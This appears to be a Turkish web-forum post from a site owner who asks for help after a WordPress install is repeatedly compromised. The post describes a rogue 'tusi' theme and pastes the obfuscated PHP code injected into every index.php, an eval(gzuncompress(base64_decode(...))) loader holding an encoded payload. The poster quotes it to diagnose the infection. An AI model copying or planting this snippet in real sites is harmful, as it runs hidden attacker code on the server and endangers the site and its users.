Dün sunucuda maldet taraması yaptım, 2 tane zararlı yazılım bulundu ve temizlendi. Tekrar her şeyi sıfırladım, panel ftp giriş şiflerine kadar. Wordpress'i kurdum ve tema bile yüklemeden öylece bıraktım. Bugün yine sitenin hacklendiğini gördüm, çıldırmak üzereyim az kaldı Dosyaları detaylıca inceledim, uploads klasörüne bir dosya yüklenmiş tusi.zip adında. Daha sonra themes klasöründe de tusi adında tema yüklendiğini ve 2 tane de farklı dosya olduğunu gördüm BURAYA TIKLAYIN. Yüklenen dosya açılmış ve tema klasörüne yerleşmiş, ordan sonra tüm index.php dosyalarının başına şifrelenmiş bir kod parçacığı yerleştiğini gördüm.
Yani tüm dosyaları sarmış bir virüsten bahsediyoruz.

<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbUqNWGgM3XHXAKSklJSdXDfg0l4t+PZ7XgdrN4Hq1vrKgzfxu/Qii9eBW9C65PjTNvxt+8/f/14fJyD1lDb1iXXKvKHQ2a5VlQNRqj7mqUqqsYTdIVaUCYNajfrRYDiQ5OAXe+LQ0EiZFmhusgx0FMyqkZDNC8k1UpQ1JY504ByDSloYTmzVGkGCbf/QiFQtOMvvx++PjhTkdpFuBK5Kk4Hiarh8L9Z3OeS1nzuddaggfvnaYJk7fC5RG2hRjpSyAp2SqaBLUPWSA7SFESlqUs2upRGyA0SjTEgRqssw/o9opYoCmYQ0OVyeb0IbnHu0cTkcSloXBo06J7bIgiTJoHZFt9HMTKIy8gfDXZIgG+5obgJbOdFb9zr945Bf2TA92vG7sIQrcpNs81O76x3ir7YweEWiOHNVdwpZep9bt+ZXTGggbat1yoBI5ScEm5MPvU8/2zQjaqz/uC86/uj7njiCUmbZVXdnOe4FirYMaQlJzWicrENGJIylhVkg0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?>

Bir de wordpress sitesinde yayınlanan ŞU tema yüklenmiş sanırım, çünkü screenshot.png dosyalarına baktım bu tema yani. Bunu nasıl çözebilirim bilgisi olan var mı acaba? Yeniden kurulum bir işe yaramıyor, maldet taraması yaptım tekrar her şey temiz görünüyor. Yardımlarınızı bekliyorum @hasanucar; @GiRGiN; @hasanbugra; @akkus71; @Alicanklc;